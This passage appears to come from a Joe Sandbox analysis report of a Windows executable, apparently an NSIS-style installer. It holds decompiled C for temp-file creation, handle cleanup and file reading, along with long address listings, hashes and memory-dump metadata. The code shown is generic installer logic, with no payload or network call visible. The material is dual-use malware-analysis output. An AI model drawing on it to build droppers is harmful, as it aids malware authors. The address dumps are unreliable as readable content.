				L174:
				_t538 = _t537 | 0xffffffff;
				return _t538;
			}










































                                    0x00406bc0
                                    0x00406bc7
                                    0x00406bcd
                                    0x00406bd3
                                    0x00000000
                                    0x00406bd7
                                    0x00406be3
                                    0x00406be3
                                    0x00406be3
                                    0x00406bec
                                    0x00000000
                                    0x00000000
                                    0x00406bf2
                                    0x00000000
                                    0x00406bf9
                                    0x00406bfd
                                    0x00000000
                                    0x00000000
                                    0x00406c06
                                    0x00406c09
                                    0x00406c0c
                                    0x00406c0e
                                    0x00406c10
                                    0x00000000
                                    0x00000000
                                    0x00406c16
                                    0x00406c19
                                    0x00406c1b
                                    0x00406c1c
                                    0x00406c1f
                                    0x00406c21
                                    0x00406c22
                                    0x00406c24
                                    0x00406c27
                                    0x00406c2c
                                    0x00406c31
                                    0x00406c3a
                                    0x00406c4d
                                    0x00406c50
                                    0x00406c59
                                    0x00406c5c
                                    0x00406c84
                                    0x00406c84
                                    0x00406c86
                                    0x00406c94
                                    0x00406c94
                                    0x00406c98
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00406c88
                                    0x00406c88
                                    0x00406c8b
                                    0x00406c8b
                                    0x00406c8c
                                    0x00406c8c
                                    0x00000000
                                    0x00406c88
                                    0x00406c5e
                                    0x00406c62
                                    0x00406c67
                                    0x00406c67
                                    0x00406c70
                                    0x00406c76
                                    0x00406c78
                                    0x00406c7b
                                    0x00000000
                                    0x00406c81
                                    0x00406c81
                                    0x00000000
                                    0x00406c81
                                    0x00000000
                                    0x00406c9e
                                    0x00406c9e
                                    0x00406ca2
                                    0x0040754e
                                    0x00000000
                                    0x0040754e
                                    0x00406cab
                                    0x00406cbb
                                    0x00406cbe
                                    0x00406cc1
                                    0x00406cc1
                                    0x00406cc1
                                    0x00406cc4
                                    0x00406cc4
                                    0x00406cc8
                                    0x00000000
                                    0x00000000
                                    0x00406cca
                                    0x00406ccd
                                    0x00406cd0
                                    0x00406cfa
                                    0x00406d00
                                    0x00406d07
                                    0x00000000
                                    0x00406d07
                                    0x00406cd2
                                    0x00406cd6
                                    0x00406cd9
                                    0x00406cde
                                    0x00406cde
                                    0x00406ce9
                                    0x00406cef
                                    0x00406cf1
                                    0x00406cf4
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00406d39
                                    0x00406d3f
                                    0x00406d42
                                    0x00406d4f
                                    0x00406d57
                                    0x00000000
                                    0x00000000
                                    0x00406d0e
                                    0x00406d0e
                                    0x00406d12
                                    0x0040755d
                                    0x00000000
                                    0x0040755d
                                    0x00406d1e
                                    0x00406d29
                                    0x00406d29
                                    0x00406d29
                                    0x00406d2c
                                    0x00406d2f
                                    0x00406d32
                                    0x00406d35
                                    0x00406d37
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x004073ce
                                    0x004073ce
                                    0x004073d4
                                    0x004073da
                                    0x004073dd
                                    0x004073e0
                                    0x004073fa
                                    0x004073fd
                                    0x00407403
                                    0x0040740e
                                    0x0040740e
                                    0x00407410
                                    0x004073e2
                                    0x004073e2
                                    0x004073f1
                                    0x004073f5
                                    0x004073f5
                                    0x00407413
                                    0x0040741a
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0040741c
                                    0x0040741c
                                    0x00407420
                                    0x004075cf
                                    0x00000000
                                    0x004075cf
                                    0x0040742c
                                    0x00407433
                                    0x0040743b
                                    0x0040743b
                                    0x0040743b
                                    0x0040743e
                                    0x00407441
                                    0x00407441
                                    0x00000000
                                    0x00000000
                                    0x00406d5f
                                    0x00406d61
                                    0x00406d64
                                    0x00406dd5
                                    0x00406dd8
                                    0x00406ddb
                                    0x00406de2
                                    0x00406dec
                                    0x00000000
                                    0x00406dec
                                    0x00406d66
                                    0x00406d6a
                                    0x00406d6d
                                    0x00406d6f
                                    0x00406d72
                                    0x00406d75
                                    0x00406d77
                                    0x00406d7a
                                    0x00406d7c
                                    0x00406d81
                                    0x00406d84
                                    0x00406d87
                                    0x00406d8b
                                    0x00406d92
                                    0x00406d95
                                    0x00406d9c
                                    0x00406da0
                                    0x00406da8
                                    0x00406da8
                                    0x00406da8
                                    0x00406da2
                                    0x00406da2
                                    0x00406da2
                                    0x00406d97
                                    0x00406d97
                                    0x00406d97
                                    0x00406dac
                                    0x00406daf
                                    0x00406dcd
                                    0x00406dcf
                                    0x00000000
                                    0x00406dcf
                                    0x00406db1
                                    0x00406db4
                                    0x00406db7
                                    0x00406dba
                                    0x00406dbc
                                    0x00406dbc
                                    0x00406dbc
                                    0x00406dbf
                                    0x00406dc2
                                    0x00406dc4
                                    0x00406dc5
                                    0x00406dc8
                                    0x00000000
                                    0x00000000
                                    0x00406ffe
                                    0x00407002
                                    0x00407020
                                    0x00407023
                                    0x0040702a
                                    0x0040702d
                                    0x00407030
                                    0x00407033
                                    0x00407036
                                    0x00407039
                                    0x0040703b
                                    0x00407042
                                    0x00407043
                                    0x00407045
                                    0x00407048
                                    0x0040704b
                                    0x0040704e
                                    0x0040704e
                                    0x00407053
                                    0x00000000
                                    0x00407053
                                    0x00407004
                                    0x00407007
                                    0x0040700a
                                    0x00407014
                                    0x00000000
                                    0x00000000
                                    0x00407068
                                    0x0040706c
                                    0x0040708f
                                    0x00407092
                                    0x00407095
                                    0x0040709f
                                    0x0040706e
                                    0x0040706e
                                    0x00407071
                                    0x00407074
                                    0x00407077
                                    0x00407084
                                    0x00407087
                                    0x00407087
                                    0x00000000
                                    0x00000000
                                    0x004070ab
                                    0x004070af
                                    0x00000000
                                    0x00000000
                                    0x004070b5
                                    0x004070b9
                                    0x00000000
                                    0x00000000
                                    0x004070bf
                                    0x004070c1
                                    0x004070c5
                                    0x004070c5
                                    0x004070c8
                                    0x004070cc
                                    0x00000000
                                    0x00000000
                                    0x0040711c
                                    0x00407120
                                    0x00407127
                                    0x0040712a
                                    0x0040712d
                                    0x00407137
                                    0x00000000
                                    0x00407137
                                    0x00407122
                                    0x00000000
                                    0x00000000
                                    0x00407143
                                    0x00407147
                                    0x0040714e
                                    0x00407151
                                    0x00407154
                                    0x00407149
                                    0x00407149
                                    0x00407149
                                    0x00407157
                                    0x0040715a
                                    0x0040715d
                                    0x0040715d
                                    0x00407160
                                    0x00407163
                                    0x00407166
                                    0x00407166
                                    0x00407169
                                    0x00407170
                                    0x00407175
                                    0x00000000
                                    0x00000000
                                    0x00407203
                                    0x00407203
                                    0x00407207
                                    0x004075a5
                                    0x00000000
                                    0x004075a5
                                    0x0040720d
                                    0x00407210
                                    0x00407213
                                    0x00407217
                                    0x0040721a
                                    0x00407220
                                    0x00407222
                                    0x00407222
                                    0x00407222
                                    0x00407225
                                    0x00407228
                                    0x00000000
                                    0x00000000
                                    0x00406df8
                                    0x00406df8
                                    0x00406dfc
                                    0x00407569
                                    0x00000000
                                    0x00407569
                                    0x00406e02
                                    0x00406e05
                                    0x00406e08
                                    0x00406e0c
                                    0x00406e0f
                                    0x00406e15
                                    0x00406e17
                                    0x00406e17
                                    0x00406e17
                                    0x00406e1a
                                    0x00406e1d
                                    0x00406e1d
                                    0x00406e20
                                    0x00406e23
                                    0x00000000
                                    0x00000000
                                    0x00406e29
                                    0x00406e2f
                                    0x00000000
                                    0x00000000
                                    0x00406e35
                                    0x00406e35
                                    0x00406e39
                                    0x00406e3c
                                    0x00406e3f
                                    0x00406e42
                                    0x00406e45
                                    0x00406e46
                                    0x00406e49
                                    0x00406e4b
                                    0x00406e51
                                    0x00406e54
                                    0x00406e57
                                    0x00406e5a
                                    0x00406e5d
                                    0x00406e60
                                    0x00406e63
                                    0x00406e7f
                                    0x00406e82
                                    0x00406e85
                                    0x00406e88
                                    0x00406e8f
                                    0x00406e93
                                    0x00406e95
                                    0x00406e99
                                    0x00406e65
                                    0x00406e65
                                    0x00406e69
                                    0x00406e71
                                    0x00406e76
                                    0x00406e78
                                    0x00406e7a
                                    0x00406e7a
                                    0x00406e9c
                                    0x00406ea3
                                    0x00406ea6
                                    0x00000000
                                    0x00406eac
                                    0x00000000
                                    0x00406eac
                                    0x00000000
                                    0x00406eb1
                                    0x00406eb1
                                    0x00406eb5
                                    0x00407575
                                    0x00000000
                                    0x00407575
                                    0x00406ebb
                                    0x00406ebe
                                    0x00406ec1
                                    0x00406ec5
                                    0x00406ec8
                                    0x00406ece
                                    0x00406ed0
                                    0x00406ed0
                                    0x00406ed0
                                    0x00406ed3
                                    0x00406ed6
                                    0x00406ed6
                                    0x00406ed6
                                    0x00406edc
                                    0x00000000
                                    0x00000000
                                    0x00406ede
                                    0x00406ee1
                                    0x00406ee4
                                    0x00406ee7
                                    0x00406eea
                                    0x00406eed
                                    0x00406ef0
                                    0x00406ef3
                                    0x00406ef6
                                    0x00406ef9
                                    0x00406efc
                                    0x00406f14
                                    0x00406f17
                                    0x00406f1a
                                    0x00406f1d
                                    0x00406f1d
                                    0x00406f20
                                    0x00406f24
                                    0x00406f26
                                    0x00406efe
                                    0x00406efe
                                    0x00406f06
                                    0x00406f0b
                                    0x00406f0d
                                    0x00406f0f
                                    0x00406f0f
                                    0x00406f29
                                    0x00406f30
                                    0x00406f33
                                    0x00000000
                                    0x00406f35
                                    0x00000000
                                    0x00406f35
                                    0x00406f33
                                    0x00406f3a
                                    0x00406f3a
                                    0x00406f3a
                                    0x00406f3a
                                    0x00000000
                                    0x00000000
                                    0x00406f75
                                    0x00406f75
                                    0x00406f79
                                    0x00407581
                                    0x00000000
                                    0x00407581
                                    0x00406f7f
                                    0x00406f82
                                    0x00406f85
                                    0x00406f89
                                    0x00406f8c
                                    0x00406f92
                                    0x00406f94
                                    0x00406f94
                                    0x00406f94
                                    0x00406f97
                                    0x00406f9a
                                    0x00406f9a
                                    0x00406fa0
                                    0x00406f3e
                                    0x00406f3e
                                    0x00406f41
                                    0x00000000
                                    0x00406f41
                                    0x00406fa2
                                    0x00406fa2
                                    0x00406fa5
                                    0x00406fa8
                                    0x00406fab
                                    0x00406fae
                                    0x00406fb1
                                    0x00406fb4
                                    0x00406fb7
                                    0x00406fba
                                    0x00406fbd
                                    0x00406fc0
                                    0x00406fd8
                                    0x00406fdb
                                    0x00406fde
                                    0x00406fe1
                                    0x00406fe1
                                    0x00406fe4
                                    0x00406fe8
                                    0x00406fea
                                    0x00406fc2
                                    0x00406fc2
                                    0x00406fca
                                    0x00406fcf
                                    0x00406fd1
                                    0x00406fd3
                                    0x00406fd3
                                    0x00406fed
                                    0x00406ff4
                                    0x00406ff7
                                    0x00000000
                                    0x00406ff9
                                    0x00000000
                                    0x00406ff9
                                    0x00000000
                                    0x00407286
                                    0x00407286
                                    0x0040728a
                                    0x004075b1
                                    0x00000000
                                    0x004075b1
                                    0x00407290
                                    0x00407293
                                    0x00407296
                                    0x0040729a
                                    0x0040729d
                                    0x004072a3
                                    0x004072a5
                                    0x004072a5
                                    0x004072a5
                                    0x004072a8
                                    0x00000000
                                    0x00000000
                                    0x00407056
                                    0x00407056
                                    0x00407059
                                    0x00000000
                                    0x00000000
                                    0x00407395
                                    0x00407399
                                    0x004073bb
                                    0x004073be
                                    0x004073c8
                                    0x004073cb
                                    0x004073cb
                                    0x00000000
                                    0x004073cb
                                    0x0040739b
                                    0x0040739e
                                    0x004073a2
                                    0x004073a5
                                    0x004073a5
                                    0x004073a8
                                    0x00000000
                                    0x00000000
                                    0x00407452
                                    0x00407456
                                    0x00407474
                                    0x00407474
                                    0x00407474
                                    0x0040747b
                                    0x00407482
                                    0x00407489
                                    0x00407489
                                    0x00000000
                                    0x00407489
                                    0x00407458
                                    0x0040745b
                                    0x0040745e
                                    0x00407461
                                    0x00407468
                                    0x004073ac
                                    0x004073ac
                                    0x004073af
                                    0x00000000
                                    0x00000000
                                    0x00407543
                                    0x00407546
                                    0x00000000
                                    0x00000000
                                    0x0040717d
                                    0x0040717f
                                    0x00407186
                                    0x00407187
                                    0x00407189
                                    0x0040718c
                                    0x00000000
                                    0x00000000
                                    0x00407194
                                    0x00407197
                                    0x0040719a
                                    0x0040719c
                                    0x0040719e
                                    0x0040719e
                                    0x0040719f
                                    0x004071a2
                                    0x004071a9
                                    0x004071ac
                                    0x004071ba
                                    0x00000000
                                    0x00000000
                                    0x00407490
                                    0x00407490
                                    0x00407493
                                    0x0040749a
                                    0x00000000
                                    0x00000000
                                    0x0040749f
                                    0x0040749f
                                    0x004074a3
                                    0x004075db
                                    0x00000000
                                    0x004075db
                                    0x004074a9
                                    0x004074ac
                                    0x004074af
                                    0x004074b3
                                    0x004074b6
                                    0x004074bc
                                    0x004074be
                                    0x004074be
                                    0x004074be
                                    0x004074c1
                                    0x004074c4
                                    0x004074c4
                                    0x004074c4
                                    0x004074c4
                                    0x004074c7
                                    0x004074c7
                                    0x004074cb
                                    0x0040752b
                                    0x0040752e
                                    0x00407533
                                    0x00407534
                                    0x00407536
                                    0x00407538
                                    0x0040753b
                                    0x00407447
                                    0x00407447
                                    0x00000000
                                    0x00407447
                                    0x004074cd
                                    0x004074d3
                                    0x004074d6
                                    0x004074d9
                                    0x004074dc
                                    0x004074df
                                    0x004074e2
                                    0x004074e5
                                    0x004074e8
                                    0x004074eb
                                    0x004074ee
                                    0x00407507
                                    0x0040750a
                                    0x0040750d
                                    0x00407510
                                    0x00407514
                                    0x00407516
                                    0x00407516
                                    0x00407517
                                    0x0040751a
                                    0x004074f0
                                    0x004074f0
                                    0x004074f8
                                    0x004074fd
                                    0x004074ff
                                    0x00407502
                                    0x00407502
                                    0x0040751d
                                    0x00407524
                                    0x00000000
                                    0x00407526
                                    0x00000000
                                    0x00407526
                                    0x00000000
                                    0x004071c2
                                    0x004071c5
                                    0x004071fb
                                    0x0040732b
                                    0x0040732b
                                    0x0040732b
                                    0x0040732b
                                    0x0040732e
                                    0x0040732e
                                    0x00407331
                                    0x00407333
                                    0x004075bd
                                    0x00000000
                                    0x004075bd
                                    0x00407339
                                    0x0040733c
                                    0x00000000
                                    0x00000000
                                    0x00407342
                                    0x00407346
                                    0x00407349
                                    0x00407349
                                    0x00407349
                                    0x00000000
                                    0x00407349
                                    0x004071c7
                                    0x004071c9
                                    0x004071cb
                                    0x004071cd
                                    0x004071d0
                                    0x004071d1
                                    0x004071d3
                                    0x004071d5
                                    0x004071d8
                                    0x004071db
                                    0x004071f1
                                    0x004071f6
                                    0x0040722e
                                    0x0040722e
                                    0x00407232
                                    0x0040725e
                                    0x00407260
                                    0x00407267
                                    0x0040726a
                                    0x0040726d
                                    0x0040726d
                                    0x00407272
                                    0x00407272
                                    0x00407274
                                    0x00407277
                                    0x0040727e
                                    0x00407281
                                    0x004072ae
                                    0x004072ae
                                    0x004072b1
                                    0x004072b4
                                    0x00407328
                                    0x00407328
                                    0x00407328
                                    0x00000000
                                    0x00407328
                                    0x004072b6
                                    0x004072bc
                                    0x004072bf
                                    0x004072c2
                                    0x004072c5
                                    0x004072c8
                                    0x004072cb
                                    0x004072ce
                                    0x004072d1
                                    0x004072d4
                                    0x004072d7
                                    0x004072f0
                                    0x004072f2
                                    0x004072f5
                                    0x004072f6
                                    0x004072f9
                                    0x004072fb
                                    0x004072fe
                                    0x00407300
                                    0x00407302
                                    0x00407305
                                    0x00407307
                                    0x0040730a
                                    0x0040730e
                                    0x00407310
                                    0x00407310
                                    0x00407311
                                    0x00407314
                                    0x00407317
                                    0x004072d9
                                    0x004072d9
                                    0x004072e1
                                    0x004072e6
                                    0x004072e8
                                    0x004072eb
                                    0x004072eb
                                    0x0040731a
                                    0x00407321
                                    0x004072ab
                                    0x004072ab
                                    0x004072ab
                                    0x004072ab
                                    0x00000000
                                    0x00407323
                                    0x00000000
                                    0x00407323
                                    0x00407321
                                    0x00407234
                                    0x00407237
                                    0x00407239
                                    0x0040723c
                                    0x0040723f
                                    0x00407242
                                    0x00407244
                                    0x00407247
                                    0x0040724a
                                    0x0040724a
                                    0x0040724d
                                    0x0040724d
                                    0x00407250
                                    0x00407257
                                    0x0040722b
                                    0x0040722b
                                    0x0040722b
                                    0x0040722b
                                    0x00000000
                                    0x00407259
                                    0x00000000
                                    0x00407259
                                    0x00407257
                                    0x004071dd
                                    0x004071e0
                                    0x004071e2
                                    0x004071e5
                                    0x00000000
                                    0x00000000
                                    0x00406f44
                                    0x00406f44
                                    0x00406f48
                                    0x0040758d
                                    0x00000000
                                    0x0040758d
                                    0x00406f4e
                                    0x00406f51
                                    0x00406f54
                                    0x00406f57
                                    0x00406f5a
                                    0x00406f5d
                                    0x00406f60
                                    0x00406f62
                                    0x00406f65
                                    0x00406f68
                                    0x00406f6b
                                    0x00406f6d
                                    0x00406f6d
                                    0x00406f6d
                                    0x00000000
                                    0x00000000
                                    0x004070cf
                                    0x004070cf
                                    0x004070d3
                                    0x00407599
                                    0x00000000
                                    0x00407599
                                    0x004070d9
                                    0x004070dc
                                    0x004070df
                                    0x004070e2
                                    0x004070e4
                                    0x004070e4
                                    0x004070e4
                                    0x004070e7
                                    0x004070ea
                                    0x004070ed
                                    0x004070f0
                                    0x004070f3
                                    0x004070f6
                                    0x004070f7
                                    0x004070f9
                                    0x004070f9
                                    0x004070f9
                                    0x004070fc
                                    0x004070ff
                                    0x00407102
                                    0x00407105
                                    0x00407105
                                    0x00407105
                                    0x00407108
                                    0x0040710a
                                    0x0040710a
                                    0x00000000
                                    0x00000000
                                    0x0040734c
                                    0x0040734c
                                    0x0040734c
                                    0x00407350
                                    0x00000000
                                    0x00000000
                                    0x00407356
                                    0x00407359
                                    0x0040735c
                                    0x0040735f
                                    0x00407361
                                    0x00407361
                                    0x00407361
                                    0x00407364
                                    0x00407367
                                    0x0040736a
                                    0x0040736d
                                    0x00407370
                                    0x00407373
                                    0x00407374
                                    0x00407376
                                    0x00407376
                                    0x00407376
                                    0x00407379
                                    0x0040737c
                                    0x0040737f
                                    0x00407382
                                    0x00407385
                                    0x00407389
                                    0x0040738b
                                    0x0040738e
                                    0x00000000
                                    0x00407390
                                    0x0040710d
                                    0x0040710d
                                    0x00000000
                                    0x0040710d
                                    0x0040738e
                                    0x004075c3
                                    0x004075e5
                                    0x004075eb
                                    0x004075ed
                                    0x004075f4
                                    0x00000000
                                    0x00000000
                                    0x00406bf2
                                    0x004075fa
                                    0x004075fa
                                    0x00000000

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.987514881.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.987509042.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987527452.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000044B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.0000000000455000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 248058040134
                                    • API String ID: 0-1212554544
                                    • Opcode ID: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
                                    • Instruction ID: 41bbaa2e3590000dceee7c9791d291245bc26db239967492cd44d063337b5de0
                                    • Opcode Fuzzy Hash: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
                                    • Instruction Fuzzy Hash: 3E814831D08228DBEF28CFA8C8447ADBBB1FF44305F14816AD856B7281D778A986DF45
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00406187 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 615 406187-406193 616 406194-4061c8 GetTickCount GetTempFileNameW 615->616 617 4061d7-4061d9 616->617 618 4061ca-4061cc 616->618 620 4061d1-4061d4 617->620 618->616 619 4061ce 618->619 619->620
                                    C-Code - Quality: 100%
                                    			E00406187(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				intOrPtr _v8;
				short _v12;
				short _t12;
				intOrPtr _t13;
				signed int _t14;
				WCHAR* _t17;
				signed int _t19;
				signed short _t23;
				WCHAR* _t26;

				_t26 = _a4;
				_t23 = 0x64;
				while(1) {
					_t12 =  *L"nsa"; // 0x73006e
					_t23 = _t23 - 1;
					_v12 = _t12;
					_t13 =  *0x40a5ac; // 0x61
					_v8 = _t13;
					_t14 = GetTickCount();
					_t19 = 0x1a;
					_v8 = _v8 + _t14 % _t19;
					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
					if(_t17 != 0) {
						break;
					}
					if(_t23 != 0) {
						continue;
					} else {
						 *_t26 =  *_t26 & _t23;
					}
					L4:
					return _t17;
				}
				_t17 = _t26;
				goto L4;
			}












                                    0x0040618d
                                    0x00406193
                                    0x00406194
                                    0x00406194
                                    0x00406199
                                    0x0040619a
                                    0x0040619d
                                    0x004061a2
                                    0x004061a5
                                    0x004061af
                                    0x004061bc
                                    0x004061c0
                                    0x004061c8
                                    0x00000000
                                    0x00000000
                                    0x004061cc
                                    0x00000000
                                    0x004061ce
                                    0x004061ce
                                    0x004061ce
                                    0x004061d1
                                    0x004061d4
                                    0x004061d4
                                    0x004061d7
                                    0x00000000

                                    APIs
                                    • GetTickCount.KERNEL32(7556D4C4,C:\Users\user\AppData\Local\Temp\,?,?,?,0040363E,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 004061A5
                                    • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,0040363E,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 004061C0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.987514881.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.987509042.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987527452.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000044B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.0000000000455000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                    Similarity
                                    • API ID: CountFileNameTempTick
                                    • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                    • API String ID: 1716503409-4262883142
                                    • Opcode ID: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                                    • Instruction ID: 21b676f9b33da427d45e0b2d6905a63b6509bf3d89a4e990effff8b21c6fdcbe
                                    • Opcode Fuzzy Hash: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                                    • Instruction Fuzzy Hash: C3F09076700214BFEB008F59DD05E9AB7BCEBA1710F11803AEE05EB180E6B0A9648768
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00403C25 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 20COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 621 403c25-403c34 622 403c40-403c48 621->622 623 403c36-403c39 CloseHandle 621->623 624 403c54-403c60 call 403c82 call 405d74 622->624 625 403c4a-403c4d CloseHandle 622->625 623->622 629 403c65-403c66 624->629 625->624
                                    C-Code - Quality: 100%
                                    			E00403C25() {
				void* _t1;
				void* _t2;
				void* _t4;
				signed int _t11;

				_t1 =  *0x40a018; // 0xffffffff
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1); // executed
					 *0x40a018 =  *0x40a018 | 0xffffffff;
				}
				_t2 =  *0x40a01c; // 0xffffffff
				if(_t2 != 0xffffffff) {
					CloseHandle(_t2);
					 *0x40a01c =  *0x40a01c | 0xffffffff;
					_t11 =  *0x40a01c;
				}
				E00403C82();
				_t4 = E00405D74(_t11, L"C:\\Users\\Albus\\AppData\\Local\\Temp\\nso9272.tmp\\", 7); // executed
				return _t4;
			}







                                    0x00403c25
                                    0x00403c34
                                    0x00403c37
                                    0x00403c39
                                    0x00403c39
                                    0x00403c40
                                    0x00403c48
                                    0x00403c4b
                                    0x00403c4d
                                    0x00403c4d
                                    0x00403c4d
                                    0x00403c54
                                    0x00403c60
                                    0x00403c66

                                    APIs
                                    • CloseHandle.KERNELBASE(FFFFFFFF), ref: 00403C37
                                    • CloseHandle.KERNEL32(FFFFFFFF), ref: 00403C4B
                                    Strings
                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00403C2A
                                    • C:\Users\user\AppData\Local\Temp\nso9272.tmp\, xrefs: 00403C5B
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.987514881.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.987509042.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987527452.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000044B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.0000000000455000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                    Similarity
                                    • API ID: CloseHandle
                                    • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nso9272.tmp\
                                    • API String ID: 2962429428-467655567
                                    • Opcode ID: 3450910aa3eb4a83e9339ad550daa728f038e8843dee50fd20da138f79135bda
                                    • Instruction ID: ab9e488bef71b432d29da19662b82269d7b8f1628316f3e3d8f7e3aa77a32ace
                                    • Opcode Fuzzy Hash: 3450910aa3eb4a83e9339ad550daa728f038e8843dee50fd20da138f79135bda
                                    • Instruction Fuzzy Hash: 3BE0863244471496E5246F7DAF4D9853B285F413357248726F178F60F0C7389A9B4A9D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00403371 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 713 403371-40337e 714 403380-403396 SetFilePointer 713->714 715 40339c-4033a5 call 403479 713->715 714->715 718 403473-403476 715->718 719 4033ab-4033be call 4061db 715->719 722 403463 719->722 723 4033c4-4033d7 call 403479 719->723 725 403465-403466 722->725 727 403471 723->727 728 4033dd-4033e0 723->728 725->718 727->718 729 4033e2-4033e5 728->729 730 40343f-403445 728->730 729->727 733 4033eb 729->733 731 403447 730->731 732 40344a-403461 ReadFile 730->732 731->732 732->722 734 403468-40346b 732->734 735 4033f0-4033fa 733->735 734->727 736 403401-403413 call 4061db 735->736 737 4033fc 735->737 736->722 740 403415-40341c call 40620a 736->740 737->736 742 403421-403423 740->742 743 403425-403437 742->743 744 40343b-40343d 742->744 743->735 745 403439 743->745 744->725 745->727
                                    C-Code - Quality: 92%
